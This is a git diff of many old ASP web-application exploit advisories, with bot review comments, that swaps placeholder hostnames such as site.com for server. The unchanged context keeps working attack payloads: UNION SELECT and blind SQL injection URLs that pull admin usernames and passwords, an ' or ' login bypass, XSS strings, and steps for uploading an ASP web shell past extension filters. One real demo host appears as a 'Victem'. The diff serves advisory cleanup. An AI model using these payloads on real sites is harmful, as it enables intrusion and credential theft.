# Path: http://www.site.com/previeweventdetail.aspx?id=[SQL]
|
||||
# Path: http://www.server/previeweventdetail.aspx?id=[SQL]
|
||||
|
||||
# Platform: ASP
|
||||
|
||||
|
|
|
@ -84,7 +84,7 @@ sub usage()
|
|||
{
|
||||
head();
|
||||
print " Usage: Thaisql.pl <Site> \r\n\n";
|
||||
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
|
||||
print " <Site> - Full path to Guestbook e.g. http://www.server/guestbook/ \r\n";
|
||||
print "=======================================================================\r\n";
|
||||
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
|
||||
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
|
||||
|
|
|
@ -11,10 +11,10 @@ Vulnerability : (Auth Bypass) SQL Injection Vulnerability
|
|||
[Auth Bypass]:
|
||||
user: pouya
|
||||
pass: ' or '
|
||||
admin page : http://site.com/[path]/admin.asp
|
||||
admin page : http://server/[path]/admin.asp
|
||||
---------------------------------
|
||||
Victem :
|
||||
http://www.etoshop.com/demo/pcstore
|
||||
---------------------------------------------------------
|
||||
#########################################################
|
||||
|
||||
|
|
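Review bot: the `Victem :` context line still names a specific third-party host, `http://www.etoshop.com/demo/pcstore`, unchanged on both sides, while the generic `admin page : http://site.com/[path]/admin.asp` placeholder was rewritten. A concrete live host in a published advisory is exactly what a scrub should remove first; replace it with a placeholder (and `Victem` is a typo for `Victim` if that line is touched).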
@ -123,4 +123,3 @@ Persistent XSS Vulnerabilities:
|
|||
|
||||
|
||||
===========================================================================================
|
||||
|
|
@ -43,7 +43,7 @@ Step 1) Login into member or User Section
|
|||
|
||||
Link:
|
||||
|
||||
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
|
||||
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
|
||||
|
||||
Step 2) Go to Edit profile
|
||||
|
||||
|
@ -66,7 +66,7 @@ Step 3) Enter your Attack Pattern
|
|||
Step 4) Refresh and View User profile
|
||||
|
||||
Demo Url:-
|
||||
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
|
||||
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
|
||||
|
||||
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
|
||||
|
||||
|
|
|
@ -38,7 +38,7 @@ Vulnerability:
|
|||
|
||||
DEMO URL:
|
||||
|
||||
http://www.site.com/detail.asp?ad_ID=1&vehicletypeID=[sqli]
|
||||
http://www.server/detail.asp?ad_ID=1&vehicletypeID=[sqli]
|
||||
|
||||
|
||||
# 0day n0 m0re #
|
||||
|
|
|
@ -45,7 +45,7 @@ if id<>"" then
|
|||
lots of files those will have to do input validation from user input are vulnerable to SQL Injection .
|
||||
|
||||
PoC :
|
||||
www.site.com/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
|
||||
www.server/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
|
||||
note : if you can't see result you need to do it blindly
|
||||
|
||||
|
||||
|
@ -53,7 +53,7 @@ note : if you can't see result you need to do it blindly
|
|||
2- Bypass uploads restriction:
|
||||
|
||||
after you got user/pass with sql injection go to
|
||||
http://site.com/admin/dc_upload.asp
|
||||
http://server/admin/dc_upload.asp
|
||||
|
||||
js file line 13-34 :
|
||||
|
||||
|
@ -82,4 +82,4 @@ function showthumb(file) {
|
|||
|
||||
as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload "ASP" shell.
|
||||
|
||||
you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)
|
||||
you can find your shell in : www.server/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)
|
|
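Review bot: the rewritten line `www.server/0_site_com/[rnd-number].asp` is internally inconsistent: the path segment `0_site_com` mirrors the old hostname `site.com` with dots replaced by underscores (the text says the application derives the location itself), but only the hostname was changed. Either rewrite the segment to match the new placeholder or leave both halves as the original placeholder pair.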
@ -65,4 +65,3 @@ PoC:
Note that : the value 2010_7_25 is the exact date of server.

===========================================================================================

@ -46,14 +46,14 @@ Description :

Considering to the code, you can browse these URLs:

http://www.site.com/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
http://www.server/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.server/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)

with the following URL you can find the first character of Username:
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--

and second character:
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--

and so on.

@ -83,4 +83,3 @@ This page remove Admins Role in VWD-CMS.

===========================================================================================

@ -179,4 +179,3 @@ Persistent XSS and XSRF:

===========================================================================================

@ -183,4 +183,3 @@ This page uploads a file

===========================================================================================

@ -61,4 +61,3 @@ Persistent XSS in admin section:

===========================================================================================

@ -9,7 +9,7 @@ Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
~Script : Gokhun ASP Stok v1.0
~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
~Vulnerability Style : Multiple vulnerabilities
~Demo : http://www.site.com/asp/pages/main/
~Demo : http://www.server/asp/pages/main/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
======== SQL Injection =========
@ -51,7 +51,7 @@ print "[-]Ornegi inceleyin\n\n";
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage1 : perl $0 server /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

@ -160,4 +160,3 @@ This page uploads a file with "xml" extension
</html>

===========================================================================================

@ -40,7 +40,7 @@ if len(sys.argv) < 2:
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

@ -38,7 +38,7 @@ if len(sys.argv) < 2:
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

@ -29,7 +29,7 @@ if len(sys.argv) < 2:
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " python exploit.py http://server/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

@ -49,7 +49,7 @@ print "[-]Ornegi inceleyin\n\n";
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage1 : perl $0 server /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

@ -29,7 +29,7 @@ private void Page_Load(object sender, EventArgs e)
}
[-] End Poc
[#] Exploit :
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
http://server/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>

[2] Remote File Upload :
@ -41,14 +41,14 @@ string acceptedFiles =
";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
You Can Bypass
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]
[#] Exploit :http://server/DesktopModules/ftb/ftb.imagegallery.aspx[*]

[3] Information Leakage Show Device Info :
http://Site.Com/security/DeviceInfo.aspx
http://server/security/DeviceInfo.aspx

[4] Xss Present :
http://Site.Com/security/DeviceInfo.aspx
http://server/security/DeviceInfo.aspx
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.BlogDB
Submit Data Without Check{
@ -104,7 +104,7 @@ SqlDbType.NVarChar, 100);
command.ExecuteNonQuery();
sqlConnectionString.Close();}
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
[#] Exploit :http://server/DesktopModules/Blog/BlogView.aspx
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]

~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@ -25,7 +25,7 @@ NewsPad Database Download Vulnerability

############################################################

exploit # www.target.com/path/database/NewsPad.mdb
exploit # server/path/database/NewsPad.mdb

############################################################

@ -1,4 +1,4 @@
) ) ) ( ( ( ( ( ) )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\

@ -1,4 +1,4 @@
) ) ) ( ( ( ( ( ) )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\

@ -1,4 +1,4 @@
) ) ) ( ( ( ( ( ) )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\

@ -1,4 +1,4 @@
) ) ) ( ( ( ( ( ) )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
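Review bot: none of the four `@@ -1,4 +1,4 @@` banner hunks above shows a visible textual difference between the removed and added first line, so these are whitespace-only edits (trailing whitespace, line endings or a byte-order mark) swept up by the bulk rewrite rather than hostname changes; the same holds for the CoreLabs advisory header and the `#!/usr/bin/perl -w` shebang hunks below. Whitespace normalisation is harmless on its own, but interleaving it with the placeholder-host rename makes a bulk rewrite of this size much harder to audit for unintended edits to exploit content. Suggest carrying the normalisation in a separate commit, or at least stating in the commit message that line endings were touched.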
@ -17,13 +17,13 @@ Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/
first go to # http://server/sitefinity/

then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
then # http://server/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

select # asp renamed via the .asp;.jpg (shell.asp;.jpg)

Upload to # http://site.com/Images/[shell]
Upload to # http://server/Images/[shell]

Video : http://net-edit0r.persiangig.com/Film/0day.rar

@ -46,4 +46,4 @@ Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1
BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker

###########################################################################
###########################################################################
@ -1,4 +1,4 @@
Core Security Technologies - CoreLabs Advisory
Core Security Technologies - CoreLabs Advisory
http://corelabs.coresecurity.com/

Multiple vulnerabilities in BugTracker.Net

@ -24,4 +24,4 @@ Code: ASP 2.0 & VBScript
SQL Injection:

http://server/ECO.asp?ECO_ID=[Code]
########################################################################################
########################################################################################
@ -24,4 +24,4 @@ Sell e-books, e-zines, Flash, digital arts, ringtones... Code: ASP 2.0 & VBScrip
SQL Injection:

http://server/shoppingcart.asp?d=[Code]
########################################################################################
########################################################################################
@ -1,4 +1,4 @@
#!/usr/bin/perl -w
#!/usr/bin/perl -w
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
@ -15,7 +15,7 @@ print "\r\n=-=-=-===============================================================
if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl server /blog/profile.asp\n\r\n";
exit ();
}

@ -36,4 +36,3 @@ Personal
# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon

@ -8,7 +8,7 @@
# Found: Br0ly
# google dork: inurl:"produtos.asp?produto="
# Use some base64 decode google IT.
# After decoding login and pass go to: www.site.com.br/administrador.asp
# After decoding login and pass go to: www.server.br/administrador.asp
# aoiuaoaaaaiuahiuahaaiauhaiuha EASY ???
# BRASIL!! :D
#
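Review bot: in this hunk the substitution turned `www.site.com.br` into `www.server.br`, which is still a syntactically valid and potentially registrable name under the `.br` TLD, so the placeholder could resolve to a real host, which is exactly what replacing example hostnames is meant to prevent. Suggest `server/administrador.asp`, matching the rest of the commit, or an RFC 2606 reserved name such as `example.com`. The leftover `www.` prefix here has the same consistency problem as the other `www.server` occurrences in this commit.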
@ -10,4 +10,4 @@ Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/resulttype.asp?probe=[Code]
http://www.example.com/resulttype.asp?probe=[Code]
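Review bot: both sides of this hunk read `http://www.example.com/resulttype.asp?probe=[Code]`, so the only change is whitespace or a line ending; `example.com` is an RFC 2606 reserved name and is correctly left alone. Nothing to fix in the content, but a whitespace-only hunk in a file that needed no hostname change suggests the rewrite tool re-saved every file it scanned; worth confirming that is intended rather than a side effect of the tool's output encoding.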
@ -6,11 +6,11 @@ dork : intext:"powered by DiyWeb"
SQL - Microsoft JET Database Engine error
-----------------------------------------

http://site.com/template.asp?menuid=[SQL]
http://site.com/viewcatalog.asp?id=[SQL]
http://site.com/xxx.asp?id=[SQL]
http://server/template.asp?menuid=[SQL]
http://server/viewcatalog.asp?id=[SQL]
http://server/xxx.asp?id=[SQL]

XSS
---
http://site.com/diyweb/login.asp?msg=[XSS] -- login page
http://server/diyweb/login.asp?msg=[XSS] -- login page

@ -8,21 +8,21 @@ Blind SQL

POC
---
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE
http://server//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://server//gallery_details.asp?a_id=12' and '0'='1 FALSE

2 - Parameter news.asp?intSeq=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE
http://www.server/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.server/news/news.asp?intSeq=69' and '0'='1 FALSE

3 - Parameter news.asp?id=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE
http://www.server/news/news.asp?id=256 and 1=1 TRUE
http://www.server/news/news.asp?id=256 and 1=0 FALSE

@ -8,13 +8,13 @@ SQL - Microsoft JET Database Engine error
------------------------------------------

view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]
http://server/page.asp?pID=[SQL]
http://server/display.asp?sortby=sections&sID=[SQL]

POC
---

http://site.com/view_article.asp?item=1 union select 1 from test.a
http://server/view_article.asp?item=1 union select 1 from test.a

thanks,
-p0pc0rn-
@ -5,10 +5,10 @@ Found by: p0pc0rn
SQL
---

http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]
http://server/page.asp?id=[SQL]
http://server/cat.asp?catid=[SQL]
http://server/catin.asp?productid=[SQL]

POC
---
http://site.com/page.asp?id=23 union select 1 from test.a
http://server/page.asp?id=23 union select 1 from test.a

@ -6,7 +6,7 @@
# Software: Element-IT PowUpload 1.3
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
# Demo:
http://site.com/Examples/PowUpload/Simpleupload.htm
http://server/Examples/PowUpload/Simpleupload.htm

[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,

@ -5,7 +5,7 @@
# Author Web: www.delincuentedigital.com.ar
# Software: EAFlashUpload v 2.5
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
# Demo: http://www.server/examples/eaflashupload/simpleupload.aspx

[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,

@ -28,10 +28,10 @@
#
#
#
# [+]http://site.com/default.asp?pid=524'
# [+]http://site.com/default.asp?pid=[SQLi]
# [+]http://site.com/viewproduct.asp?PID=130'
# [+]http://site.com/viewproduct.asp?PID=[SQli]
# [+]http://server/default.asp?pid=524'
# [+]http://server/default.asp?pid=[SQLi]
# [+]http://server/viewproduct.asp?PID=130'
# [+]http://server/viewproduct.asp?PID=[SQli]
#
#
# => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam

@ -6,7 +6,7 @@
First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
http://www.server/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1

You will find admin's password

@ -12,7 +12,7 @@ Exploit Details :

2- Browse This Link : /forum/pm_show_message.asp?ID= "it's a message on Your Inbox"

3- Poc: www.site.com//forum/pm_show_message.asp?ID=(inject here)
3- Poc: www.server//forum/pm_show_message.asp?ID=(inject here)
----------------------------------------------------------------

****** SSMM T34M ******
Some files were not shown because too many files have changed in this diff